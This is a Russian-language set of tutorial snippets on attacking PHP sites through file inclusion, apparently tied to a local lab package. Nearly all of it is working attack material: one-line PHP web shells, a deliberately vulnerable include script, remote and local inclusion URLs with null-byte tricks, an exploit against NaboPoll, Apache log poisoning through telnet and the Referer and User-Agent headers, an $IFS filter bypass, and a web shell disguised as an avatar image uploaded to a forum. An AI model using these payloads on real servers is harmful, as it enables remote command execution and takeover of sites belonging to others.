Создадим в редакторе новый файл с текстом
<pre>
<?php
print("<b>$cmd</b>\n");
system($cmd);
?>
</pre>
***************************
Для этого примера создадим в редакторе новый файл (File New) со следующими
командами:
<?
$page = ($_GET['page']);
include("$page");
?>
***********************
http://localhost/inj.php?page=http://localhost/cmd.php?cmd=ls
*************************************************************
В Linux есть переменная окружения $IFS,
которую можно использовать в качестве разделителя (пробела). Тогда наша
команда примет вид ls$IFS-la.
********************************
Рассмотрим немного другой текст веб-шелла:
<pre><? system($_GET['cmd']);?></pre>
****************************************
Чтобы вы знали, какие цифры следует вводить, изучите следующий перечень:
0 — никаких разрешений;
1 — только исполнение;
2 — только запись;
3 — запись и исполнение;
4 — только чтение;
5 — чтение и исполнение;
6 — чтение и запись;
7 — все права (чтение, запись и исполнение).
*************************************************************************
NaboPoll
http://localhost/webexploitation_package_02/nabopoll/
survey.inc.php?path=http://localhost/cmd.php?cmd=ls%00
********************************************************

Apach
Вводим в браузере адрес:
httpd://localhost/index.php?page=./../../logs/access_log%00
*************************************************************
Далее в консоли
по протоколу telnet подключаемся к порту 80 локального компьютера:
telnet 127.0.0.1 80
В ответ на приглашение программы вводим следующее:
GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1
---------------------------------------------------
при этом программный код нашего веб-шелла, а именно <pre><?passthru
($_GET['cmd']);?></pre>, пропишется в журналы access_log и error_log примерно
таким образом:
файл error_log:
[error] [client 127.0.0.1] Invalid URI in request GET <pre><?passthru
($_GET['cmd']);?></pre> HTTP/1.1
файл access-log:
127.0.0.1 — - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET['cmd']);?>
</pre> HTTP/1.1
*****************************************************
В некоторых системах параметры, передаваемые вызовом GET, фильтруются.
В этом случае вам потребуется ввести веб-шелл в поле Referer или User-Agent,
Referer: http://127.0.0.1/<pre><?passthru($_GET['cmd']);?></pre>
--------------------------------------
Далее можно вводить команды в браузере:
httpd://localhost/index.php?page=./../logs/access_log%00&cmd=ls+-la
********************************************************************
если на сервере работает ftpd (сервер доступа по протоколу FTP), то можно проделать пример-
но то же, что и с логами Apache
--------------------------------
Рассмотрим
пример с локальным инклудом. Предположим, имеется некий форум. Берем наш
веб-шелл <pre><? passthru($_GET['cmd']);?><pre>, переименовываем в avatar.gif
и закачиваем, а далее делаем запрос на форум:
----------------------------------------------------------------
http://[target]/forum.php?page=./../smileys/avatar.gif%00&cmd=ls
****************************************************************
Настройки доступа
